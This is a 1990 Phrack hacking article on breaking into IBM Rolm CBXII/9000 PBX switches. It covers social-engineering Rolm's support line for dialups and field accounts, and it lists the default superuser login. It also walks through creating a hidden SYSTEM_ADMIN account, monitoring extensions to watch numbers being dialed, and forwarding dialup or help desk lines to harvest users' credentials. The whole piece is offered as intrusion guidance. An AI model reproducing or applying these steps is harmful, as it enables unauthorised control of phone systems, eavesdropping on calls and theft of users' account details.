==Phrack Inc.== Volume Three, Issue Thirty-one, Phile #3 of 10 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ / * * \ \ / / Hacking Rolm's CBXII/9000 \ \ by DH / / 05/24/90 \ \ * * / \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Introduction ------------ IBM Rolm's CBXII/9000 is a very powerful machine. Powerful in the aspect that one has the switch(s) at his control. Controling switches means you can control the entire PBX environment (And it's users). This file will not get technical. Basically, I'm writing this file on the HOW-TO's of the internal works of CBXII and the basics of obtaining the dialups and account information need to access the machines. For further information on CBX's in general, read Epsilon's Phrack Phile on them, or consult Evil Jay's phile on OSL's. Obtaining Dialups --------- ------- Obtaining dialups unfortunately is the hardest part of hacking CBXII's. (Yes, even harder than hacking them). There are several ways to obtain the dialups. I would say a good bit of CBX's are at universities and hospitals where they own their own switches. Most of the time you can determine if they have one by calling the Telecommunications Department of the target location. Or, another way is to check with ROLM. If you *KNOW* that a target location has a CBXxx machine, you can call ROLM's 800 wats line and say your with the Telecommunications Department and your looking for the DIALUP. Rolm has files on all their CBXxx's and the Dialups also. They might ask you for a NODE # for the dialup, and you should usually respond with what node you want (Since different nodes handle different areas of the PBX). Basically, nodes start at ONE and usually goto THREE or FOUR, depending on the size of the PBX. CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which is a highly used and common voice mail system). This of course doesn't mean that every PHM (Phone-Mail) system has a CBXxx attached. But it is generally a good start. The following is a checklist to determine if the target location could have a CBXxx for controlling their switch. By no means however, if your target location has all of the following it could have a CBXxx. 1) Does the location handle it's own switch? If so, what kind, and who services it. 2) Does IBM Rolm handle any aspect of their telecommunications department? If so, this is a possible CBXxx location. 3) Does the location have Rolm Phone-Mail? These three guidelines are not requirements. I.E. -- The location could have a non-IBM PBX but still have a CBXxx for handling the switch. So who knows.. It's up to you and your bullshitting and scans. Hacking the CBXxx's ------- --- ------- Well, once you have obtained the dial-ups, you are almost halfway there. Hacking the CBX is the easy part. 1st off, IBM Rolm ships *ALL* of their machines with a default account (Yes, and they never change it). When the destination of the CBX recieves the machine, they use the default to create other accounts for employees, PBX operators, and administration. Rolm IBM also has a field support account embedded in the machine. These are different to each location and correspond to the serial number of the machine (Rolm's accounts can be obtained from Rolm's 800 technical support line). So, now that we know that there is a default account that telecom department uses to setup the other accounts after they recieve the machine, tells us that this is a priviledge account. And it is. USERNAME: SU PASSWORD: SUPER How nice for them to give us such power. Yes, it's a basic default with SuperUser priviledge. If for some reason the account default has been changed, their are other ways of getting in: 1) Call Rolm and get the Field account information. 2) Try first names of Telecom Dept. employees, and PBX Operators. 3) Use every Hacking skills you have (If any). Some older versions of CBX don't even require logging in with an account. Those versions are less responsive to the administrators needs, but can be useful to one also. Don't be discouraged if the SU password is changed, just call Rolm and get the field account. The following is the matrix before one access the machine. *Note that it clearly identifies* *Also: Accessible at 300 baud and e,7,1* CONNECT ID banner _Release version # / / /\ Rolm CBXII RELEASE 9004.0.65 RB74UCLA11956 BIND DATE: 8/SEP/88 \ YOU HAVE ENTERED NODE 1, CPU 2 \_Name of owner, IE: UCLA 11:14:30 ON FRIDAY 2/11/1990 (System ID) USERNAME: xxx PASSWORD: xxx INVALID USERNAME-PASSWORD PAIR. Once your in ---- ---- -- Once your in, you should have no problems wondering around the machine and using the utilities in the machine's operating system. There is very specific help functions inside the machine that will guide you through with no problems. At the CBX prompt: %. HELP ? or %. ? Should produce a valid listing of options and sub-functions. Every function can be followed with a '?' to give lists of valid sub-functions under that function or how the syntax of that function should be used. The following is a listing of commands for CBXII/9000: ABORT ACTIVATE ATTR BYE CANCEL CARD CDRSM CDT CHANGE CHG CLEAR CLR CMPCT CMSTS CNCL CNFG CONVERT COPY CPEG CTMON CTRA CTRTL CXCLR COPY CXCLR CXCON CXNET DACK DADD DAEVT DANS DBDMP DCAT DCF DCOM DDMA DDQ DDT DE DEACTIVATE DEFINE DELETE DEMOUNT DESUM DEX DFACK DFCOM DFEAT DFEVT DHTQ DHWS DIAG DIQ DISABLE DIWQ DKQ DML DMNT DMS DMTST DOWN DPATR DPMR DPMS DPPRI DPTR DQQ DRCT DREGS DSBLE DSQ DSST DSTAK DTCB DTDQ DWQ DX_TR ENABLE ENB ENBLE ETIO EX EXM EXN EXP EXPAND FINIT FORMAT FREER FSD GTOD HDBST HELP INSTALL KPFA LCT LIST LOAD LOGOFF LOGON LPEG LPKT LSCT LSL LST LTCB MNT MONITOR MOUNT MTRACE NEXT NSTAT PAGE PCNFG PDIO PFA PKTS PLIST PLTT PPFA PS PSH QAT QITM QTEST RCT RECEIVE RENAME REPLY RESTART RESTORE REVERSE RM RMOFF RPFA RSC RSCLK RSTOR RSTRT SAT SCAN SEND SET SHOW SITM SOCON SOUNC SSAT START STATE STATUS STEST STOD STOP STRT STS TDCD TEST TKSTS TRTL TST TX UNLK UNLOCK UP VERIFY XDEF XMIT XPND These commands can be executed from and '% ' prompt. If the command is followed by a '?', more information will be supplied about the command. Using the ICI ----- --- --- The Interactive Configuration Interface controls immediate changes in the switch and PBX environment. The Utility is explained in great detail through the actual running of it. You can access the ICI by typing: % CNFG CBXII/9000 INTERACTIVE CONFIGURATION INTERFACE CPU 2 15:14:32 ON FRIDAY 5/02/1990 COMMAND: This is the main command prompt. From here you can exercise the '?' help list to get valid commands. There are four phases of the ICI utility: Modify, Create, List, and Delete. These can be used on Extentions, Trunks, Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect. The following is a sample of using 'list' to list a current extention in the PBX: _Forward to EXTN 2000 COMMAND: LIST EXT 4038 / _Outside number / FORWARD ON / to forward to FORWARDING BSY RNA DND / EXTN TYPE COS TARGET1 TARGET2 I E I E I E RINGDOWN NAME ---- ---- --- ------- ------- - - - - - - -------- ---------- DS 4038 EXTN 56 2000 1 1 1 1 1 1 95551212 R.STABELL \ \ \ / / \ \ Extention / -Class of service if R Auto. Forward Owner of --Type of line BUSY I No Matter What EXTN. (Reg. Extention) N G Note: The 1's specifies to forward to target#1 & NO ANSWER (As 2's would mean forward to #2 target) This should detail how to modify a listing like above using the 'MODIFY' command in the ICI. Once modified, all transactions are processed immediately. Using the 'Delete' command one can delete extentions, trunks, ect. So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE. Each can be used with the following "Nouns" to modify that "Noun": BUTTON_120 BUTTON_240 CDR_EXCLUDE CNFG_ERRORS CNFG_QUEUE CNFG_STATUS CNFG_USERS COM_GROUP COS_FEAT DATA_ACCESS DATA_DEVICE DATA_GROUP DATA_LINE DATA_SUBMUX DLI ETS EXTEN FAC FAC_TYPE FAMILY FEAT_CODE FIRST_DIGIT HD_GROUP LEX LOGON_PROFILE MAP MEM_PARTS PARAM PICK POWER Q_TYPE ROUTE_LIST RP RPD RPI RPS_120S_ON RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI SPEED T1D3 T1D3_GRP TRUNK TRUNK_GROUP VPC The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on the system. One can use MODFIY or CREATE to set them up an account with SU access. The FAMILY noun is the listing of the groups with different access, to different "nouns" available. I.E.: Not everyone can access the CHANGE LOGON_PROFILE to create an account. To create an account with SU access, type (while in ICI): % CREATE LOGON_PROFILE ENTER NAME (1-12 CHAR): TEST ENTER PASSWORD: TEST RETYPE: TEST Next it will ask you for a family. For SU access, type "SYSTEM_ADMIN". After family, the machine should prompt you for a "verb". Verbs are the actual functions or commands, so in this environment you can set the commands a user can access. So, for SU, enter "ALL" for every command access. To get a valid listing of users online, try this: % LIST CNFG_USERS NUMBER OF USERS MAX NUMBER OF USERS 3 5 PORT USER_NAME START_TIME HOW_LONG 17 SU 17:47:57 0:28:34 2 FIELD 18:16:03 0:0:28 3 MARYB 18:16:03 0:10:03 Using the Monitoring Utility ----- --- ---------- ------- This command is one of the more powerful commands in the CBXxx system. The monitor command should be invoked from within the main function command level and not in the ICI level. The monitoring command allows you to actually watch or monitor TRUNKS and EXTENTIONS. So, if I were to type: % MONITOR EXT 4038 10:02:43 ON FRIDAY MAY/02/1990 EXT# STATE DI CODE DIGITS PROCESS STATUS ---- --------------- -- ---- ------------- ------------ ------ 4038 IDLE STN FWD NUM FWD \ \ / / / \ Extention Not in use Standard \ / Forwarded Extention \ / Forwarded to a number This shows the extention to be IDLE and not in use. But, with forwarded call processes to a standard number. You would have to use ICI to look up the number it's forwarded to if you wanted. % MONITOR EXT 4038 10:03:44 ON FRIDAY MAY/11/1990 EXT# STATE DI CODE DIGITS PROCESS STATUS ---- -------------- -- ---- ------------- ----------- ------ 4038 DIAL TONE STN FWD NUM FWD 4038 DIALING Y 9 / \ \ \ 4038 DIALING Y 92 S F N \Extention 4038 DIALING Y 923 t o u Forwarded 4038 DIALING Y 9233 a N r m 4038 DIALING Y 92334 n u w b 4038 DIALING Y 923345 d m a e 4038 DIALING Y 9233456 a b r r 4038 DIALING Y 92334564 r e d 4038 CONN T025N N \ d r e / \ / \ d \ \ \_Dialing NO \_Number dialed \_Extention \ Connected to Outside trunk T025N This monitoring shows the extention actually dialing the number, and then connecting to an outside truck. Unfortunatley, one we cannot monitor without access to a bell switch. Monitoring can also be done with trunks. I will not display any trunk monitoring since it is quite simple to decypher. Manipulating the switch ------------ --- ------ There are many ways you can manipulate the CBX's to gain accounting information on data lines within the PBX environment. One sure-fire method would be to forward an actual data dial-up extention to a bridge or loop and then write an emulation to intercept the user's account information real-time as they connect to your fake dial-up. Or perhaps if an university uses the CBX, one could maybe forward the computer help desk extention to a bridge or loop and as an unsuspecting user calls up, ask him what machine and account info he has access to for a help log sheet you are taking. Who cares. Who knows. There are thousands of things you can do to use the CBX to your advantage. Hell, you have the whole switch at your command. DH - 05/11/90 _______________________________________________________________________________